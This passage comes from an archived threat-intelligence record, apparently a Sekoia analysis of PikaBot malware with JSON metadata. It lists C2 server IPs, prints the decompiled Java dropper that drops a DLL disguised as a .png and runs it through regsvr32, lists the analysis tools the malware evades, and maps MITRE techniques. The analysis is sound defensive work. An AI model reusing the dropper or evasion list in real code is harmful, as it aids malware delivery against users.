2023-06-30\r\n103.151.20.137 2078 2023-05-17 2023-08-03\r\n129.153.135.83 2078 2023-05-17 2023-08-18\r\n37.1.208.52 443 2023-02-01 2023-03-02\r\n45.182.189.106 443 2023-02-01 2023-02-10\r\n23.227.194.96 443 
2023-02-01 2023-08-03\r\n23.227.193.224 443 2023-02-01 2023-03-02\r\n213.142.147.218 443 2023-02-01 2023-02-10\r\n185.87.151.234 443 2023-02-01 2023-03-02\r\n5.45.69.171 443 2023-02-01 2023-02-10\r\n62.197.48.230 443 2023-02-01 2023-03-02\r\n5.61.43.38 443 2023-02-01 2023-03-02\r\n185.87.150.108 443 2023-02-01 2023-02-10\r\n205.204.71.238 443 2023-02-01 2023-03-02\r\n37.1.215.220 443 2023-02-01 2023-03-09\r\nTable 2. IoCs of PikaBot C2 servers\r\nAnnexes\r\nAnnex 1 – Short campaign analysis\r\nThe sample analysed in this FLINT originates from a phishing campaign in which the payload is delivered as an email\r\nattachment. The attached file is a ZIP archive (PERFERENDISF.zip) containing a Java JAR file. The JAR file\r\ncan be extracted with the 7z tool; it contains three files:\r\nFigure 16. Content of the ZIP archive delivered in the PikaBot phishing campaign\r\nThe file “hBHGHjbH.class” is the Java code used to load and execute the next stage of the attack, the GIF is the\r\nicon of the JAR, and the file “163520” contains the malicious next-stage payload (the PikaBot stage-0 DLL).\r\nimport java.io.File;\r\nimport java.io.InputStream;\r\nimport java.nio.file.CopyOption;\r\nimport java.nio.file.Files;\r\n\r\npublic class hBHGHjbH {\r\n    public static void main(String[] var0) {\r\n        try {\r\n            // Drop path: %TEMP%\\\\163520.png, a DLL hidden behind an image extension\r\n            File var1 = new File(System.getProperty(\"java.io.tmpdir\") + \"\\\\163520.png\");\r\n            if (!var1.exists()) {\r\n                // Copy the JAR resource \"163520\" (the DLL) to disk\r\n                InputStream var2 = hBHGHjbH.class.getResourceAsStream(\"163520\");\r\n                Files.copy(var2, var1.getAbsoluteFile().toPath(), new CopyOption[0]);\r\n            }\r\n            Thread.sleep(1000L);\r\n            // Load the dropped DLL silently through regsvr32, which calls its DllRegisterServer export\r\n            Runtime.getRuntime().exec(\"regsvr32 /s \" + System.getProperty(\"java.io.tmpdir\") + \"\\\\163520.png\");\r\n        } catch (Exception var3) {\r\n            System.out.println(\"Error!\");\r\n        }\r\n    }\r\n}\r\nThe Java code is straightforward: it extracts the resource “163520” from the JAR to a temporary directory and\r\nadds a 
fake “.png” extension before running it with regsvr32.exe.\r\nAnnex 2 – List of banned processes\r\ncheatengine-x86_64-SSE4-AVX2.exe\r\nx32dbg.exe\r\nx64dbg.exe\r\nFiddler.exe\r\nhttpdebugger.exe\r\ncheatengine-i386.exe\r\ncheatengine-x86_64.exe\r\nPETools.exe\r\nLordPE.exe\r\nSysInspector.exe\r\nroc_analyzer.exe\r\nsysAnalyzer.exe\r\nsniff_hit.exe\r\nwindbg.exe\r\njoeboxcontrol.exe\r\njoboxserver.exe\r\nResourceHacker.exe\r\nImmunityDebugger.exe\r\nWireswhar.exe\r\ndumpcap.exe\r\nHookExplorer.exe\r\nImportREC.exe\r\nidaq.exe\r\nidaq64.exe\r\nlldbg.exe\r\nProcessHacker.exe\r\ntcpview.exe\r\nautoruns.exe\r\nautorunsc.exe\r\nfilemon.exe\r\nprocmon.exe\r\nregmon.exe\r\nprocessxp.exe\r\nMITRE ATT\u0026CK TTPs\r\nTactic Technique\r\nCommand and Control T1071.001 – Application Layer Protocol: Web Protocols\r\nCommand and Control T1573.001 – Encrypted Channel: Symmetric Cryptography\r\nExfiltration T1041 – Exfiltration Over C2 Channel\r\nCommand and Control T1571 – Non-Standard Port\r\nDefense Evasion T1497.001 – Virtualization/Sandbox Evasion: System Checks\r\nDefense Evasion T1140 – Deobfuscate/Decode Files or Information\r\nDefense Evasion T1027.007 – Obfuscated Files or Information: Dynamic API Resolution\r\nDefense Evasion T1622 – Debugger Evasion\r\nDefense Evasion T1497.003 – Virtualization/Sandbox Evasion: Time Based Evasion\r\nDiscovery T1087.002 – Account Discovery: Domain Account\r\nDiscovery T1016 – System Network Configuration Discovery\r\nDiscovery T1057 – Process Discovery\r\nDiscovery T1033 – System Owner/User Discovery\r\nDiscovery T1614.001 – System Location Discovery: System Language Discovery\r\nDiscovery T1482 – Domain Trust Discovery\r\nDiscovery T1083 – File and Directory Discovery\r\nDiscovery T1087.001 – Account Discovery: Local 
Account\r\nExecution T1106 – Native API\r\nExecution T1053.005 – Scheduled Task/Job: Scheduled Task\r\nExecution T1059.003 – Command and Scripting Interpreter: Windows Command Shell\r\nExecution T1129 – Shared Modules\r\nPersistence T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nPrivilege Escalation T1055.002 – Process Injection: Portable Executable Injection\r\nPrivilege Escalation T1055.003 – Process Injection: Thread Execution Hijacking\r\nPrivilege Escalation T1055.012 – Process Injection: Process Hollowing\r\nTable 3. MITRE ATT\u0026CK TTPs of PikaBot\r\nExternal references\r\nhttps://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html\r\nhttps://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\r\nhttps://twitter.com/Unit42_Intel/status/1623349272061136900\r\nhttps://twitter.com/1ZRR4H/status/1623600348060389376\r\nhttps://twitter.com/search?q=from%3A%40cryptolaemus1%20%22pikabot%22\u0026f=live\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nhttps://www.zscaler.com/blogs/security-research/technical-analysis-pikabot\r\nhttps://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls\r\nhttps://www.vmray.com/cyber-security-blog/why-your-edr-let-pikabot-jump-through/\r\nhttps://www.zscaler.com/blogs/security-research/d-evolution-pikabot\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you#obfuscation-c\r\nhttps://victorbush.com/2015/04/the-anti-rootkit-rootkit/\r\nhttps://blog.krakz.fr/notes/syswhispers2/\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nhttps://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398\r\nThank you for reading this blog post. We welcome any reaction, feedback or criticism of this analysis. 
Please\r\ncontact us on tdr[at]sekoia.io.\r\nTags: Cybercrime, Infrastructure, Malware, Reverse\r\nSource: https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\n
13721 2024-02-19 2024-03-30\n145.239.135.24 5243 2024-02-19 2024-03-30\n109.199.99.131 13721 2024-02-19 2024-03-23\n141.95.106.106 2967 2024-02-19 2024-03-23\n89.117.23.34 5938 2024-02-19 2024-03-23\n89.117.23.185 2221 2024-02-19 2024-03-30\n172.232.190.57 2224 2024-02-17 2024-03-23\n185.179.217.216 9785 2024-02-16 2024-03-23\n172.232.174.6 5242 2024-02-16 2024-03-23\n172.232.186.100 2083 2024-02-15 2024-03-23\n86.38.225.109 13724 2024-02-14 2024-03-21\n131.153.231.178 2221 2024-02-14 2024-03-20\n45.32.21.184 5242 2024-02-14 2024-03-20\n104.156.233.235 2226 2024-02-14 2024-03-21\n  Page 22 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n95.179.135.3 2225 2024-02-14 2024-03-20\n198.44.187.12 2224 2024-02-14 2024-03-23\n155.138.147.62 2223 2024-02-14 2024-03-20\n154.201.81.8 2967 2024-02-14 2024-03-15\n108.61.78.17 13783 2024-02-14 2024-03-20\n172.232.189.219 2224 2024-02-14 2024-03-23\n172.232.162.97 13783 2024-02-14 2024-03-23\n172.232.189.10 1194 2024-02-14 2024-03-23\n43.229.78.74 2226 2024-02-14 2024-03-15\n104.129.55.106 13783 2024-02-13 2024-03-30\n45.76.251.190 5631 2024-02-13 2024-03-21\n103.82.243.5 13785 2024-02-13 2024-03-30\n104.129.55.105 2223 2024-02-13 2024-03-30\n45.32.248.100 2226 2024-02-13 2024-03-21\n86.38.225.105 13721 2024-02-12 2024-03-30\n86.38.225.106 2221 2024-02-12 2024-03-30\n86.38.225.108 2226 2024-02-12 2024-03-19\n37.60.242.86 2967 2024-02-09 2024-03-23\n178.18.246.136 2078 2024-02-09 2024-03-30\n23.226.138.161 5242 2024-02-09 2024-03-23\n85.239.243.155 5000 2024-02-08 2024-03-30\n139.84.237.229 2967 2024-02-08 2024-03-15\n95.179.191.137 5938 2024-02-08 2024-03-15\n158.220.80.157 9785 2024-02-08 2024-03-15\n158.220.80.167 2967 2024-02-08 2024-03-15\n65.20.66.218 5938 2024-02-08 2024-03-15\n37.60.242.85 9785 2024-02-08 2024-03-30\n  Page 23 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n104.129.55.103 2224 2024-02-08 2024-03-15\n104.129.55.104 2223 
2024-02-08 2024-03-15\n78.47.233.121 443 2024-01-24 2024-02-23\n109.123.227.104 2221 2024-01-23 2024-03-17\n139.180.185.171 2222 2024-01-23 2024-03-17\n192.248.174.52 5631 2024-01-23 2024-03-17\n154.38.184.3 2223 2024-01-23 2024-03-17\n85.239.243.3 23399 2023-12-23 2024-01-29\n109.123.227.158 2223 2023-12-21 2024-01-29\n109.123.227.174 23399 2023-12-21 2024-01-29\n85.239.237.153 5632 2023-12-21 2024-01-28\n172.234.224.202 13785 2023-12-21 2024-01-20\n5.180.151.180 2224 2023-12-21 2024-01-29\n5.180.151.194 5631 2023-12-21 2024-01-29\n109.123.227.167 5938 2023-12-21 2024-01-29\n172.232.172.228 2221 2023-12-21 2024-01-20\n172.232.189.141 2078 2023-12-21 2024-01-20\n109.123.227.170 5632 2023-12-21 2024-01-29\n172.232.172.171 13721 2023-12-21 2024-01-20\n154.38.164.50 5243 2023-12-21 2024-01-28\n109.123.227.147 5243 2023-12-21 2024-01-29\n109.123.227.166 5938 2023-12-21 2024-01-29\n172.232.7.224 9785 2023-12-21 2024-01-20\n185.187.235.158 23399 2023-12-20 2024-01-29\n172.232.189.134 2221 2023-12-20 2024-01-27\n65.20.78.70 2967 2023-12-20 2024-01-19\n139.180.137.30 5000 2023-12-20 2024-01-19\n  Page 24 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n172.232.161.248 13783 2023-12-20 2024-01-19\n107.191.56.230 13783 2023-12-20 2024-01-19\n89.117.55.179 2083 2023-12-20 2024-01-28\n216.128.179.120 2967 2023-12-20 2024-01-19\n216.128.151.26 13782 2023-12-20 2024-01-27\n172.232.162.62 2083 2023-12-20 2024-01-19\n46.250.253.58 5243 2023-12-20 2024-01-27\n178.154.205.14 443 2023-12-20 2024-01-19\n149.28.252.250 5000 2023-12-20 2024-01-27\n172.232.172.117 1194 2023-12-20 2024-01-19\n89.117.55.178 2083 2023-12-20 2024-01-28\n104.207.143.168 2222 2023-12-20 2024-01-27\n154.38.185.135 13782 2023-12-20 2024-01-27\n95.179.247.197 13782 2023-12-20 2024-01-19\n64.176.67.92 2078 2023-12-20 2024-01-19\n172.232.189.146 2078 2023-12-20 2024-01-19\n172.232.190.249 5631 2023-12-20 2024-01-19\n154.38.185.138 13786 2023-12-20 2024-01-28\n45.76.119.22 
13724 2023-12-19 2024-01-18\n69.164.213.141 5631 2023-12-19 2024-01-18\n78.141.223.212 1194 2023-12-19 2024-01-25\n45.76.96.172 2223 2023-12-18 2024-01-25\n64.176.13.28 2083 2023-12-18 2024-01-25\n45.76.22.139 13786 2023-12-18 2024-01-25\n51.161.81.190 13721 2023-12-18 2024-02-29\n45.56.71.218 13724 2023-12-18 2024-01-26\n216.238.79.12 2221 2023-12-18 2024-01-25\n  Page 25 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n78.141.200.111 5938 2023-12-18 2024-01-25\n65.20.85.39 2967 2023-12-18 2024-01-25\n149.28.100.66 5243 2023-12-18 2024-01-25\n172.232.54.192 2224 2023-12-18 2024-01-26\n208.76.221.253 13724 2023-12-18 2024-01-25\n70.34.196.219 2226 2023-12-18 2024-01-25\n172.232.188.4 2226 2023-12-18 2024-01-26\n155.138.140.156 13720 2023-12-18 2024-01-25\n45.33.15.215 2967 2023-12-18 2024-01-26\n172.232.189.166 1194 2023-12-18 2024-01-26\n149.28.189.244 2222 2023-12-17 2024-01-23\n66.135.31.146 2078 2023-12-16 2024-01-15\n172.232.163.182 2222 2023-12-16 2024-01-23\n65.20.115.154 5243 2023-12-15 2024-01-22\n54.37.79.82 2223 2023-12-15 2024-01-21\n167.179.93.21 1194 2023-12-15 2024-01-22\n57.128.103.99 2078 2023-12-15 2024-01-21\n172.232.170.25 13724 2023-12-15 2024-01-23\n172.232.173.219 5938 2023-12-14 2024-01-22\n172.232.186.251 5632 2023-12-14 2024-01-23\n172.232.162.198 13721 2023-12-14 2024-01-23\n31.210.51.93 443 2023-12-14 2024-01-13\n149.28.17.176 1194 2023-12-13 2024-01-19\n172.232.163.208 2224 2023-12-13 2024-01-20\n172.232.164.77 5000 2023-12-13 2024-01-20\n64.176.66.137 5000 2023-12-13 2024-01-19\n64.176.68.223 13785 2023-12-13 2024-01-19\n  Page 26 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n107.191.47.85 5243 2023-12-13 2024-01-19\n172.232.163.111 5938 2023-12-13 2024-01-20\n172.232.175.59 5938 2023-12-13 2024-01-20\n172.232.164.159 5632 2023-12-13 2024-01-20\n95.179.212.178 13782 2023-12-13 2024-01-19\n45.32.253.21 2083 2023-12-13 2024-01-19\n192.248.183.93 5632 
2023-12-13 2024-01-19\n199.247.8.136 13786 2023-12-13 2024-01-19\n141.95.108.72 443 2023-12-12 2024-01-11\n155.138.203.158 1194 2023-12-11 2024-03-17\n65.20.98.24 13783 2023-12-11 2024-03-17\n65.20.82.254 5243 2023-12-11 2024-03-17\n109.123.227.54 13785 2023-12-11 2024-01-18\n154.38.184.5 9785 2023-12-11 2024-01-18\n66.42.80.169 5631 2023-12-11 2024-01-18\n109.123.227.50 13782 2023-12-11 2024-01-18\n158.220.90.199 2083 2023-12-09 2024-01-18\n45.137.192.63 23399 2023-12-08 2024-01-17\n31.220.96.162 2224 2023-12-08 2024-01-18\n161.97.98.95 2083 2023-12-08 2024-01-17\n158.220.103.150 5632 2023-12-08 2024-01-17\n45.32.188.56 2967 2023-12-07 2024-01-06\n192.248.151.140 23399 2023-12-07 2024-01-06\n64.176.225.21 2225 2023-12-07 2024-01-14\n45.137.192.84 2223 2023-12-07 2024-01-17\n45.32.235.46 5242 2023-12-07 2024-01-06\n70.34.207.219 5000 2023-12-07 2024-01-06\n  Page 27 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n139.84.235.8 2225 2023-12-07 2024-01-06\n64.176.218.254 9785 2023-12-07 2024-01-14\n46.250.241.191 13721 2023-12-07 2024-01-15\n216.128.136.231 13786 2023-12-07 2024-01-06\n108.61.224.209 2967 2023-12-07 2024-01-06\n46.250.241.197 5000 2023-12-07 2024-01-15\n65.20.74.26 2221 2023-12-07 2024-01-14\n158.220.90.198 2083 2023-12-07 2024-01-18\n65.20.77.81 5242 2023-12-06 2024-01-05\n207.148.103.233 2967 2023-12-06 2024-01-05\n199.247.15.68 5938 2023-12-06 2024-01-13\n78.141.222.198 13786 2023-12-06 2024-01-05\n45.63.26.148 2224 2023-12-06 2024-01-05\n57.128.83.129 2078 2023-12-01 2024-01-21\n45.76.98.136 2221 2023-12-01 2024-01-22\n154.211.12.126 2967 2023-12-01 2024-02-05\n141.95.108.252 2078 2023-12-01 2024-01-21\n57.128.109.221 13724 2023-12-01 2024-01-21\n57.128.164.11 5242 2023-12-01 2024-01-21\n139.99.222.29 5631 2023-12-01 2024-01-14\n57.128.108.132 13785 2023-12-01 2024-01-21\n172.232.173.141 2226 2023-12-01 2024-01-23\n51.83.253.102 9785 2023-12-01 2024-01-21\n46.250.241.188 1194 2023-11-18 
2023-12-25\n207.148.93.23 2221 2023-11-17 2023-12-24\n64.176.190.166 2222 2023-11-17 2023-12-24\n45.32.244.94 9785 2023-11-17 2023-12-24\n  Page 28 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n155.138.132.163 13786 2023-11-15 2023-12-21\n158.247.196.155 9785 2023-11-15 2023-12-21\n45.32.232.31 13782 2023-11-15 2023-12-21\n45.33.69.35 5242 2023-11-15 2023-12-22\n172.232.189.83 5243 2023-11-15 2023-12-25\n97.107.131.224 13782 2023-11-15 2023-12-25\n172.232.189.84 23399 2023-11-15 2023-12-22\n70.34.223.131 5938 2023-11-13 2023-12-19\n139.180.168.216 13786 2023-11-13 2023-12-20\n95.179.182.147 2078 2023-11-13 2023-11-23\n167.179.100.211 2221 2023-11-13 2023-12-21\n95.179.214.49 5242 2023-11-13 2023-12-20\n70.34.242.159 5243 2023-11-13 2023-12-20\n154.12.255.254 23399 2023-11-09 2023-12-17\n65.20.77.19 5242 2023-11-09 2023-12-16\n158.247.215.68 2225 2023-11-09 2023-12-16\n95.179.206.77 13782 2023-11-09 2023-12-16\n217.69.14.55 13724 2023-11-09 2023-12-16\n149.28.49.170 23399 2023-11-09 2023-12-16\n158.247.246.182 2226 2023-11-07 2023-12-14\n158.247.197.73 23399 2023-11-06 2023-12-06\n104.238.144.171 2221 2023-11-06 2023-12-06\n136.244.98.80 13783 2023-11-06 2023-12-14\n198.13.58.126 2223 2023-11-06 2023-12-06\n45.76.103.152 13720 2023-11-06 2023-12-19\n65.20.84.3 2221 2023-11-06 2023-12-06\n149.248.53.65 2221 2023-11-06 2023-12-14\n  Page 29 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n65.20.84.254 13783 2023-11-06 2023-12-06\n207.246.111.127 13786 2023-11-06 2023-12-14\n158.247.202.180 13783 2023-11-06 2023-12-06\n95.179.141.41 1194 2023-11-04 2023-12-10\n167.179.103.206 2083 2023-11-03 2023-12-09\n45.32.140.39 2078 2023-11-03 2023-12-09\n45.33.85.73 13721 2023-11-01 2023-12-08\n172.233.154.98 13785 2023-11-01 2023-12-08\n172.233.185.220 5242 2023-11-01 2023-12-08\n104.237.145.83 2083 2023-11-01 2023-12-08\n50.116.54.138 13724 2023-10-31 2023-12-08\n51.68.144.135 2083 2023-10-31 
2023-12-08\n140.82.56.164 5632 2023-10-31 2023-11-30\n139.144.97.180 2224 2023-10-31 2023-11-30\n104.200.28.75 2222 2023-10-30 2023-12-08\n202.182.121.203 2083 2023-10-30 2023-11-29\n65.20.82.17 5938 2023-10-30 2023-12-06\n158.247.210.203 2222 2023-10-30 2023-11-29\n172.234.16.175 2083 2023-10-30 2023-12-06\n185.106.94.167 5631 2023-10-28 2023-12-05\n45.79.174.92 1194 2023-10-28 2023-12-05\n139.144.31.103 1194 2023-10-28 2023-12-04\n216.128.176.211 2222 2023-10-27 2023-12-04\n172.234.29.13 2224 2023-10-24 2023-12-01\n198.244.141.4 9785 2023-10-24 2023-12-03\n172.233.187.145 2226 2023-10-24 2023-12-02\n139.144.215.192 13785 2023-10-24 2023-11-30\n  Page 30 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n172.233.186.50 5632 2023-10-24 2023-11-30\n45.33.76.163 2223 2023-10-24 2023-12-01\n45.79.147.119 9785 2023-10-24 2023-12-01\n172.232.188.124 2083 2023-10-24 2023-11-23\n217.69.8.229 13782 2023-10-24 2023-11-30\n139.177.198.199 2226 2023-10-24 2023-12-02\n172.232.24.58 2226 2023-10-24 2023-11-30\n176.58.102.36 2225 2023-10-24 2023-11-30\n15.235.143.190 2224 2023-10-23 2023-12-06\n85.215.218.128 5243 2023-10-23 2023-11-29\n103.231.93.15 5631 2023-10-23 2023-12-03\n155.138.156.94 5243 2023-10-23 2023-11-29\n154.12.252.84 23399 2023-10-23 2023-12-18\n196.218.123.202 13783 2023-10-23 2024-03-23\n156.251.137.134 5000 2023-10-23 2023-11-29\n51.68.146.19 5242 2023-10-23 2023-12-06\n139.99.216.90 13720 2023-10-23 2023-12-06\n34.135.79.247 443 2023-10-21 2023-11-20\n109.107.182.12 443 2023-10-20 2023-11-19\n109.107.182.13 443 2023-10-20 2023-11-19\n109.107.182.17 443 2023-10-20 2023-11-19\n109.107.182.18 443 2023-10-20 2023-11-19\n109.107.182.15 443 2023-10-20 2023-11-19\n109.107.182.14 443 2023-10-20 2023-11-19\n109.107.182.16 443 2023-10-20 2023-11-19\n109.107.182.10 443 2023-10-19 2023-11-26\n109.107.182.11 443 2023-10-19 2023-11-26\n  Page 31 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  
\n109.107.182.19 443 2023-10-19 2023-11-18\n91.215.85.216 443 2023-10-18 2023-11-25\n91.215.85.154 443 2023-10-18 2023-11-25\n91.215.85.197 443 2023-10-18 2023-11-26\n85.106.94.167 5631 2023-10-17 2023-11-16\n185.106.94.177 13721 2023-10-17 2023-11-23\n185.106.94.152 13720 2023-10-17 2023-11-23\n80.85.140.43 9785 2023-10-17 2023-11-24\n80.85.140.152 5938 2023-10-11 2023-11-24\n78.128.112.208 443 2023-10-11 2023-11-24\n88.214.27.74 443 2023-10-11 2023-11-23\n185.106.94.174 5000 2023-10-11 2023-11-23\n45.182.189.105 443 2023-10-11 2023-11-23\n94.16.122.250 2078 2023-10-09 2023-10-19\n94.228.169.221 2083 2023-10-09 2023-10-19\n45.131.108.250 1194 2023-10-04 2023-11-03\n144.64.204.81 2078 2023-10-04 2023-11-03\n102.129.139.65 32999 2023-10-04 2023-11-12\n79.141.175.96 2078 2023-10-03 2023-11-02\n209.126.9.47 2078 2023-10-03 2023-11-02\n167.86.96.3 2222 2023-10-03 2023-11-02\n38.242.240.28 1194 2023-10-03 2023-11-13\n192.254.69.35 2078 2023-10-02 2023-10-12\n104.243.45.170 2222 2023-10-02 2023-10-12\n154.92.19.139 2222 2023-10-01 2024-01-14\n15.235.47.206 13783 2023-10-01 2023-12-08\n15.235.202.109 2226 2023-10-01 2023-12-08\n  Page 32 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n137.220.55.190 2223 2023-10-01 2023-12-27\n65.20.78.68 13721 2023-10-01 2023-12-21\n70.34.209.101 13720 2023-10-01 2023-12-27\n158.247.253.155 2225 2023-10-01 2023-12-27\n15.235.45.155 2221 2023-10-01 2023-12-08\n15.235.47.80 23399 2023-10-01 2023-12-08\n64.176.67.194 2967 2023-10-01 2023-10-31\n51.68.147.114 2083 2023-10-01 2023-12-08\n154.221.30.136 13724 2023-10-01 2024-03-17\n64.176.5.228 13783 2023-10-01 2023-12-21\n210.243.8.247 23399 2023-10-01 2024-03-17\n51.79.143.215 13783 2023-10-01 2023-12-08\n51.195.232.97 13782 2023-10-01 2023-12-16\n154.61.75.156 2078 2023-10-01 2024-01-20\n139.180.216.25 2967 2023-10-01 2023-12-27\n172.233.156.100 13721 2023-10-01 2023-12-28\n188.26.127.4 13785 2023-10-01 2023-12-09\n15.235.44.231 5938 2023-10-01 
2023-12-08\n192.9.135.73 1194 2023-09-25 2024-03-23\n148.153.34.82 2078 2023-09-25 2023-11-29\n135.125.124.72 2078 2023-09-25 2023-11-06\n24.199.109.6 2222 2023-07-24 2023-08-10\n8.20.255.249 2078 2023-06-19 2023-08-24\n185.87.148.132 1194 2023-05-22 2023-06-21\n89.116.131.40 2222 2023-05-22 2023-06-21\n85.215.162.167 2078 2023-05-21 2023-07-06\n154.80.229.112 2078 2023-05-21 2023-07-06\n  Page 33 of 38",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/"
	],
	"report_names": [
		"pikabot-a-guide-to-its-deep-secrets-and-operations"
	],
	"threat_actors": [
		{
			"id": "d9b39228-0d9d-4c1e-8e39-2de986120060",
			"created_at": "2023-01-06T13:46:39.293127Z",
			"updated_at": "2026-04-10T02:00:03.277123Z",
			"deleted_at": null,
			"main_name": "BelialDemon",
			"aliases": [
				"Matanbuchus"
			],
			"source_name": "MISPGALAXY:BelialDemon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b4f83fef-38ee-4228-9d27-dde8afece1cb",
			"created_at": "2023-02-15T02:01:49.569611Z",
			"updated_at": "2026-04-10T02:00:03.351659Z",
			"deleted_at": null,
			"main_name": "TA577",
			"aliases": [
				"Hive0118"
			],
			"source_name": "MISPGALAXY:TA577",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "22d450bb-fc7a-42af-9430-08887f0abf9f",
			"created_at": "2024-11-01T02:00:52.560354Z",
			"updated_at": "2026-04-10T02:00:05.276856Z",
			"deleted_at": null,
			"main_name": "TA577",
			"aliases": [
				"TA577"
			],
			"source_name": "MITRE:TA577",
			"tools": [
				"Pikabot",
				"QakBot",
				"Latrodectus"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434400,
	"ts_updated_at": 1775792010,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f5652518458409da22148a2e2733c558aea9b10.pdf",
		"text": "https://archive.orkl.eu/4f5652518458409da22148a2e2733c558aea9b10.txt",
		"img": "https://archive.orkl.eu/4f5652518458409da22148a2e2733c558aea9b10.jpg"
	}
}